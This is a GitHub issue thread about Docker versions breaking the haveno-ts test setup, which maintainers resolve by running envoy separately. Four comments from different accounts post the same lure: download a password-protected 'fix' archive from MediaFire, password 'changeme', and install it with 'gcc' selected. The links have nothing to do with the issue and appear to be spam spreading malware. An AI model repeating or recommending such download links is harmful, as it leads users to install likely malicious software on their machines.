### ISSUE TITLE
Update docker [2 XMR]

### ISSUE THREAD

**Issue by woodser** [haveno-dex/haveno-ts#308]
Running the tests with the latest docker fails with the error: `Http response at 400 or 500 level, http status code: 503.`

The error occurs when starting the Haveno services manually, and only using docker to start envoy to bridge between http1 and http2. The error may occur when using docker for all services / CI tests, but I haven't tested that.

The issue is resolved by using an earlier version of docker, [Docker 4.26.1](https://docs.docker.com/desktop/release-notes/#4261).

This issue requests updating to the latest version of docker.

**Comment by ritiiq** [comment]
Download 
https://www.mediafire.com/file/wpwfw3bpd8gsjey/fix.rar/file
password: changeme
In the installer menu, select "gcc."

**Comment by uno-zero** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/6mkbh6xhau31g
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by masooddahmedd** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/6mkbh6xhau31g
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by scppuna** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/6mkbh6xhau31g
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by woodser** [comment]
@Myestery Great :) We can leave it unassigned and bounty will go to the first working solution. Thanks very much.

**Comment by mainnet-pat** [comment]
Resolved in https://github.com/haveno-dex/haveno-ts/pull/312

**Comment by woodser** [comment]
Looks like we're awaiting a new update to docker to fix this issue, at least on macOS: https://github.com/docker/for-mac/issues/7332

**Comment by woodser** [comment]
Resolved by @mainnet-pat in https://github.com/haveno-dex/haveno-ts/pull/315, by updating the instructions to use envoy separately from docker and adding local envoy config.
